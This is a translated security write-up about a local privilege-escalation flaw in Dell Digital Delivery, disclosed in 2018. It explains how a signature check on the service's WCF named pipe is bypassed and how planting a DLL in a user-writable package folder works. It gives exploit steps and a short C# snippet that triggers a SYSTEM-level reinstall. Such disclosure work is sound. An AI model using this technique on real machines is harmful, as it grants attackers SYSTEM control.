美文网首页
Dell Digital Delivery本地提权 - CVE-

Dell Digital Delivery本地提权 - CVE-

作者: 蚁景科技 | 来源:发表于2018-09-07 14:38 被阅读31次

本文为原创文章,转载请注明出处!


早在3、4月的时候,我开始逆向我笔记本上一系列的戴尔程序。这些程序和服务权限都较高,并且运行时候做的任务比较复杂。我之前在SupportAssist里发现过一个本地提权漏洞, 现在又在戴尔的数字传送平台(Digital Delivery platform)里发现了另一个。这篇文章就讲讲戴尔数字传送(以下简称为DDD,Dell Digital Delivery)里的这个漏洞是怎么被利用的。至今还没有人利用这个漏洞造成危害。戴尔已经针对这个漏洞发布了安全报告。

SupportAssist和DDD很复杂,所以漏洞也会很多。如果你对挖掘大型的C#/C++应用里的本地提权漏洞感兴趣,可以试试这两个程序。

Dell’s Digital Delivery是用来安装软件的。它可以让用户购买、管理软件,并且DDD预装在大部分的戴尔电脑上。

Bug

DDD以SYSTEM权限运行,服务名是DeliveryService, 程序名是DeliveryService.exe。DeliveryTray.exe是用户层面的组件,让用户可以对软件进行管理、安装。

DeliveryTray和DeliveryService之间的通信是通过一个Windows Communication Foundation (WCF)命名管道进行的。WCF 是两个进程交换数据的标准方法。像web服务器的REST API一样,WCF允许服务注册为处理端并说明主要功能。

Dell.ClientFulfillmentService.Controller.Initialize中对WCF命名管道的初始化如下所示:

this._host = WcfServiceUtil.StandupServiceHost(typeof(UiWcfSession),

                               typeof(IClientFulfillmentPipeService),

                               "DDDService");

初始化过程调用了Dell.NamedPipe.StandupServiceHost:

ServiceHost host = null;

string apiUrl = "net.pipe://localhost/DDDService/IClientFulfillmentPipeService";

Uri realUri = new Uri("net.pipe://localhost/" + Guid.NewGuid().ToString());

Tryblock.Run(delegate

{

 host = new ServiceHost(classType, new Uri[]

 {

   realUri

 });

 host.AddServiceEndpoint(interfaceType, WcfServiceUtil.CreateDefaultBinding(), string.Empty);

 host.Open();

}, null, null);

AuthenticationManager.Singleton.RegisterEndpoint(apiUrl, realUri.AbsoluteUri);

由apiUrl注册的服务开始侦听,AuthenticationManager的singleton负责处理请求。一有请求,AuthenticationManager就将其传给AuthPipeWorker函数执行以下身份验证:

string execuableByProcessId = AuthenticationManager.GetExecuableByProcessId(processId);

bool flag2 = !FileUtils.IsSignedByDell(execuableByProcessId);

if (!flag2)

{

   ...

仅当另一端是由戴尔签名的二进制文件时,请求才会建立连接。

这是在3.1 (我最初测试时候的版本) 和3.5 (现在的最新版, 3.5.1001.0)版本之间加进来的新防护措施,戴尔可能意识到了这里有漏洞点。但这防护还远远不够。我可以通过生成一个由戴尔签名的二进制文件(例如DeliveryTray.exe)并在其中注入代码来绕过这个防护措施。注入代码后,可以访问特权服务的WCF API。

端点服务由Dell.NamedPipe实现,有十几个函数。如下所示:

ArchiveAndResetSettings

EnableEntitlements

EnableEntitlementsAsync

GetAppSetting

PingTrayApp

PollEntitlementService

RebootMachine

ReInstallEntitlement

ResumeAllOperations

SetAppSetting

SetAppState

SetEntitlementList

SetUserDownloadChoice

SetWallpaper

ShowBalloonTip

ShutDownApp

UpdateEntitlementUiState

DDD将应用程序安装包称为“entitlements”(可以在以上所列函数中找到对应项),安装/重装自然就是指那些可以被安装以及已经安装好的软件包。

我第一个研究的函数是ReInstallEntitlement,顾名思义,它会启动一个已安装程序包的重装进程。代码实现如下所示:

private static void ReInstallEntitlementThreadStart(object reInstallArgs)

{

   PipeServiceClient.ReInstallArgs ra = (PipeServiceClient.ReInstallArgs)reInstallArgs;

   PipeServiceClient.TryWcfCall(delegate

   {

       PipeServiceClient._commChannel.ReInstall(ra.EntitlementId, ra.RunAsUser);

   }, string.Concat(new object[]

   {

       "ReInstall ",

       ra.EntitlementId,

       " ",

       ra.RunAsUser.ToString()

   }));

}

这个函数通过一个WCF调用将根据请求构建好的参数送到WCF端点。ReInstallEntitlement有两个参数: 一个软件包ID和一个RunAsUser标志(如上所示),都由调用者控制。

在服务端Dell.ClientFulfillmentService.Controller管理这些函数的具体实现,OnReInstall处理重装进程,它先执行一些完整性检查、验证包签名,然后让InstallationManager将重装请求压入任务队列。InstallationManager有一个任务队列以及检查新任务的后台线程(WorkingThread) ,当收到新的安装请求时就会调用InstallSoftware。

软件包将缓存到磁盘并等待重新安装。安装步骤就不多说了。

将放在C:\ProgramData\Dell\DigitalDelivery\Downloads\Software\的安装包先解压然后安装。比如我们安装DellDataProtection-SecurityToolsv1.9.1,你就会在任务管理器里看到一个安装进程:

"C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _

Security Tools v1.9.1\STSetup.exe" -y -gm2 /S /z"\"CIRRUS_INSTALL,

SUPPRESSREBOOT=1\""

此进程的运行用户由可控制的RunAsUser标志确定,如果设置为False,则使用SYSTEM权限从%ProgramData%目录中运行。

在STSetup进程的启动阶段,任务管理器中有如下进程:

C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\VERSION.dll

C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\UxTheme.dll

C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\PROPSYS.dll

C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\apphelp.dll

C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\Secur32.dll

C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\api-ms-win-downlevel-advapi32-l2-1-0.dll

这里有意思的是,系统中的用户对父目录%ProgramData%\Dell\DigitalDelivery\Downloads\Software都没有写入权限,但对安装包文件夹DellDataProtection-SecurityTools有写入权限。

这让非特权用户可以将任意文件放入这个目录,给了我们使用DLL注入的机会。

漏洞利用

漏洞利用有以下步骤:

将DLL放在适当的%ProgramData%软件包目录下

启动运行由Dell签名的可执行文件的新进程

将C#代码注入这个进程(运行在无特权的用户空间中)

从被注入的进程中连接到WCF命名管道

触发ReInstallEntitlement

步骤4、5可以用下面的C#代码完成:

PipeServiceClient client = new PipeServiceClient();

client.Initialize();

while (PipeServiceClient.AppState == AppState.Initializing)

 System.Threading.Thread.Sleep(1000);

EntitlementUiWrapper entitle = PipeServiceClient.EntitlementList[0];

PipeServiceClient.ReInstallEntitlement(entitle.ID, false);

System.Threading.Thread.Sleep(30000);

PipeServiceClient.CloseConnection();

上面用到的类是从NamedPipe.dll导入的。我这里仅仅选择了第一个可选的软件包然后重装,你可能需要遍历软件包来确定哪个软件包的重装进程会用到你注入的代码。

我在Github上放出了PoC, 戴尔也已经放出了相应的安全报告。

时间线

05/24/18 – 初次漏洞报告 05/30/18 – 戴尔请求获得更多信息 06/26/18 – 戴尔提供有关审核和修复的更新 07/06/18 – 戴尔提供内部跟踪ID并更新进度 07/24/18 – 更新请求 07/30/18 – 戴尔确认他们将发布安全建议和相关的CVE 08/07/18 – 允许90天后进行漏洞细节公开 08/10/18 – 戴尔确认公开日期为8月22日 08/22/18 – 公开漏洞细节

翻译原文链接:

http://hatriot.github.io/blog/2018/08/22/dell-digital-delivery-eop/


文章仅用于普及网络安全知识,提高小伙伴的安全意识的同时介绍常见漏洞的特征等,若读者因此做出危害网络安全的行为后果自负,与合天智汇以及原作者无关,特此声明。

相关文章

  • Dell Digital Delivery本地提权 - CVE-

    本文为原创文章,转载请注明出处! 早在3、4月的时候,我开始逆向我笔记本上一系列的戴尔程序。这些程序和服务权限都较...

  • 记录Linux下的钓鱼提权思路

    参考Freebuf上的提权文章(利用通配符进行Linux本地提权):http://www.freebuf.com/...

  • 任务1:本地提权

    注:笔记来源安全牛课堂,感谢倪群主,感谢苑老师! 安全意识好的管理员肯定会给不同的用户设置不同的权限。因此,我们很...

  • 2019-08-08

    pr提权 提权利用的漏洞 Microsoft Windows RPCSS服务隔离本地权限提升漏洞 RPCSS服务没...

  • 网络安全-Day50-Serv-u本地提权及带配置文件修改提权

    Serv-u本地提权及带配置文件修改提权 1、把文件复制到虚拟机 2、双击ServU6200.exe安装(默认安装...

  • 17.提权

    提权方法:溢出漏洞提权、数据库提权(mysql提权(udf提权,mof提权,自启动提权)、mssql提权)、第三方...

  • Web渗透测试(4)—本地提权方法

    之前有几个面试官问我,怎么在Linux上本地提权,想了下脚本提权的倒是有几种方法,而通过溢出的方法获取root权限...

  • 利用metasploit提权

    MS16-016漏洞提权实战 启动msfuse exploit/multi/script/web_delivery...

  • Vulnhub靶机:Symfonos1

    标签:SMB共享、本地文件包含、邮件投毒、linux提权 0x00 环境准备 下载地址:https://www.v...

  • linux 提权-Crontab提权

    前言 记录一下linux提权系列的Crontab计划任务提权的学习过程。 crontab 命令 crontab命令...

网友评论

      本文标题:Dell Digital Delivery本地提权 - CVE-

      本文链接:https://www.haomeiwen.com/subject/kjkcgftx.html